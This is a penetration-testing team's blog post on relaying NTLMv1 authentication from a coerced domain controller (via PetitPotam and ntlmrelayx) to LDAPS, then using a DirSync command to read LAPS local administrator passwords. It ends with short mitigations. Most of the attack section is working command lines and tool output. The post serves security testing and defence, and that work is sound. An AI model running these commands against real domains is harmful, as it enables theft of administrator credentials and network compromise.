Defeat LAPS with NTLMv1-Relay

Pentest Team @greenhats.com
3 min readOct 13, 2022

In our internal pentests, relay attacks that use the NTLMv1 protocol are still successful (unfortunately). Many older systems cannot be converted to better methods such as Kerberos, so a large number of attacks against NTLMv1 are still possible.

The two most common attacks are explained on the following blog entry: https://www.trustedsec.com/blog/practical-attacks-against-ntlmv1/

In our scenario we assume, that other methods are not working correctly and LAPS is used on the domain. Also we will not discuss cracking the hash with hashcat or crack.sh.

The attack works in many corporate networks, since almost all of the prerequisites are default settings or common:

  • two domain controllers (with Windows Server 2012 functional level)
  • no active LDAP signing (default)
  • NTLMv1 activated on DC (often found)
  • one of the domain controllers must reach the attacker system via port 445 (SMB) (often possible)
  • one of the domain controllers must authenticate to the attacker system via PetitPotam, PrinterNightmare, Coercer etc. (rarely that all fixes and workarounds are implemented)
  • NTLM authentication should be globally active (default)
  • LAPS enabled (fortunately already implemented in many infrastructures)
Outline of the attack (created with https://whimsical.com) — Love this tool
  1. Trigger SMB connection and NTLM authentication via PetitPotam
ntlmrelayx.py -t ldaps://dc2.domain.local — remove-mic -smb2support -i

python PetitPotam.py -pipe all LOCAL-IP dc1.domain.local

2. Authenticate via SMB with DC1$, relay the session and use the LDAP shell

[*] SMBD-Thread-5 (process_request_thread): Received connection from x.x.x.x, attacking target ldaps://dc2.domain.local

3. Relay the authentication to LDAPS and receive an interactive LDAP shell as DC1$

[*] Authenticating against ldaps://dc2.domain.local as DOMAIN/DC1$ SUCCEED
[*] Started interactive Ldap shell via TCP on 127.0.0.1:11000

Connect to LDAP shell using ncat

ncat 127.0.0.1 11000

4. Obtain LAPS password via DirSync method

To read the LAPS password (ms-Mcs-AdmPwd), special permissions are required, which the computer object of the domain controller usually does not have. Thus, the native LDAP shell function “get_laps_password” cannot be used directly. A DCSYNC cannot be executed with this session, since this is not performed exclusively via the LDAP protocol and also requires a signed session, which is not guaranteed by the preceding relay attack.

A remedy here can be the “DirSync” function, which allows targeted synchronization of objects via LDAP.

This functionality has been implemented (as of 10/13/2022) via a still open PR in the “impacket” toolkit.

After updating the file “ldap_shell.py” according to the referenced code, the LAPS password of the computer named “COMPUTER123$” can be obtained using the following command:

dirsync “(sAMAccountName=COMPUTER123$)” “ms-Mcs-AdmPwd”

Mitigations

The attack can be effectively stopped in several ways.

  1. Firewall layer (network segmentation): Blocking connections via port 445 from any domain controller outbound to any client network
  2. Global disabling of NTLM or disable NTLMv1

More information on NTLMv1

Thanks for reading. Cheers.

--

--

Pentest Team @greenhats.com

evait security GmbH (aka pentest team of greenhats): full time white hacking / pentesting company who always stays on bleeding edge - https://www.greenhats.com